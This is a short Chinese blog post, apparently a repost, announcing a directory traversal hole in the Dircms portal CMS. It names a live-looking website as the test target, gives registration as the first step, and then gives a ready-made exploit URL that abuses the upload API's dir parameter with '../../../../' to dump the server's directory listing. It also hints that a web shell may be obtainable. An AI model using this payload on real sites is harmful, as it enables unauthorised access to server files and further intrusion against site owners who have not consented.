Dircms门户系统遍历目录漏洞漏洞预警 -电脑资料
作者:疯子
今天无聊想找个CMS挖看看,
Dircms门户系统遍历目录漏洞漏洞预警
。就在A5找到dircms
商业版那个叫贵吖。又不安全,不知道是不是就一个程序员,一个客服的小公
挖到一个遍历目录
貌似还有地方可以拿shell晚上回家测试
刚刚百度,乌云貌似是12号有提交
不过还没有公开所以不算抄袭,
电脑资料
《Dircms门户系统遍历目录漏洞漏洞预警》()。测试网站:http://www.tengzhou0632.com
先注册会员
然后打开EXP:http://Madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../
然后目录就全部爆出来了,喜欢的自己下载源码去研究。有免费版的。
下载地址:http://down.chinaz.com/soft/27402.htm
